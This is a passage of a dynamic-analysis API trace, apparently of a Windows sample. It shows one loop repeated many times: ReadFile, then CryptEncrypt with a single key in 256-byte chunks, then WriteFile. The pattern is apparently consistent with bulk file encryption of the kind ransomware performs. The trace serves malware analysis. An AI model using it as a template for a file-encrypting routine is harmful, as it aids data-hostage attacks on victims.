pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.375] GetLastError () returned 0x0 [0166.375] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.375] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.375] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.375] GetLastError () returned 0x0 [0166.375] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.375] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.375] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.375] GetLastError () returned 0x0 [0166.375] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.375] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.375] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.375] GetLastError () returned 0x0 [0166.375] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.375] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.375] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.375] GetLastError () returned 0x0 [0166.375] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.375] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.376] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.376] GetLastError () returned 0x0 [0166.376] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.376] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.376] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.376] GetLastError () returned 0x0 [0166.376] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.376] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.376] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.376] GetLastError () returned 0x0 [0166.376] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.376] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.376] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.376] GetLastError () returned 0x0 [0166.376] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.376] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.376] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.376] GetLastError () returned 0x0 [0166.376] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.376] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.376] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.376] GetLastError () returned 0x0 [0166.376] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.376] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.377] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.377] GetLastError () returned 0x0 [0166.377] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.377] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.377] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.377] GetLastError () returned 0x0 [0166.377] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.377] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.377] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.377] GetLastError () returned 0x0 [0166.377] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.377] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.377] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.377] GetLastError () returned 0x0 [0166.377] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.377] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.377] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.377] GetLastError () returned 0x0 [0166.377] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.377] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.377] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.377] GetLastError () returned 0x0 [0166.377] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.377] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.377] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.378] GetLastError () returned 0x0 [0166.378] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.378] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.378] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.378] GetLastError () returned 0x0 [0166.378] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.378] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.378] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.378] GetLastError () returned 0x0 [0166.378] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.378] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.378] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.378] GetLastError () returned 0x0 [0166.378] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.378] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.378] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.378] GetLastError () returned 0x0 [0166.378] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.378] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.378] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.378] GetLastError () returned 0x0 [0166.378] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.378] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.378] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.378] GetLastError () returned 0x0 [0166.379] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.379] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.379] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.379] GetLastError () returned 0x0 [0166.379] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.379] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.379] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.379] GetLastError () returned 0x0 [0166.379] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.379] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.379] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.379] GetLastError () returned 0x0 [0166.379] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.379] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.379] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.379] GetLastError () returned 0x0 [0166.379] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.379] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.379] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.379] GetLastError () returned 0x0 [0166.379] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.379] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.379] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.379] GetLastError () returned 0x0 [0166.379] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.379] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.380] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.380] GetLastError () returned 0x0 [0166.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.380] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.380] GetLastError () returned 0x0 [0166.380] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.380] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.380] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, 